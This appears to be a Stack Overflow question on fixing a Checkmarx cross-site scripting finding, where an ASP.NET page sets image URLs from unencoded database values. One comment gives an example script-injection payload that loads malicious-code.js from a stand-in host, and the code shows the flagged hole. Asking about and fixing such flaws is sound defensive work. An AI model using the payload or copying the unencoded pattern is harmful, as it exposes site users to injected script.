# Cross Site Scripting Attack in Asp.net C#

Tags: c#, asp.net, xss, checkmarx

Below is the code for which the checkmarx report has stated XSS risk.

```
public string MasterPage(string name)
     {
        var img = string.Empty;

            SqlConnection dataConnection1 = new SqlConnection(conn);

            SqlCommand dataCommand2 = dataConnection1.CreateCommand();

            // dataCommand2.CommandText = "select Uid from Usrtable where Uname = @Uname";
            dataCommand2.CommandText = "select Uimage from Usrtable where Uname = @Uname";
            dataCommand2.Parameters.AddWithValue("@Uname", name.ToString());

            dataConnection1.Open();
            //   int id = (int)(dataCommand2.ExecuteScalar());
             img =(string) dataCommand2.ExecuteScalar();
            dataConnection1.Close();


        }
```

UI

```
 <asp:Image ID="Image1" Runat="server" />
```

aspx.cs

```
       var img = logic.MasterLogic(name);
            Image1.ImageUrl = @"images" + "/" + img.ToString();//images is a folder.Getting img from database table. img is the image path saved in the db.The report points at this line for vulnerability.
            Image2.ImageUrl = @"images" + "/" + img.ToString();
            string clientname = Session["clientname"].ToString();
            Client.Text = Session["clientname"].ToString();
```

The report says as; the data class file gets data from
the database, for the ExecuteScalar element. This element’s value then flows through the code without being
properly filtered or encoded and is eventually displayed to the user in method Page_Load(aspx.cs)

Comment: What stops a user from putting in this as their image (string?): `%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e`

Comment: it points at this line of the code. Should we do html encoding. If so hw.                                                                                                          img =(string) dataCommand2.ExecuteScalar();

Comment: I'm not sure what sort of input you're accepting from the user. At the very least it needs to be encoded; https://learn.microsoft.com/en-us/aspnet/core/security/cross-site-scripting

Comment: @ George clientname is a string the user types in for example clientname="Amazon", and img is also a string which is saved in the database as  img.jpg. where should I encode.

Comment: Possible duplicate of [Prevent Cross site scripting attack in asp.net C#](http://stackoverflow.com/questions/43586189/prevent-cross-site-scripting-attack-in-asp-net-c-sharp)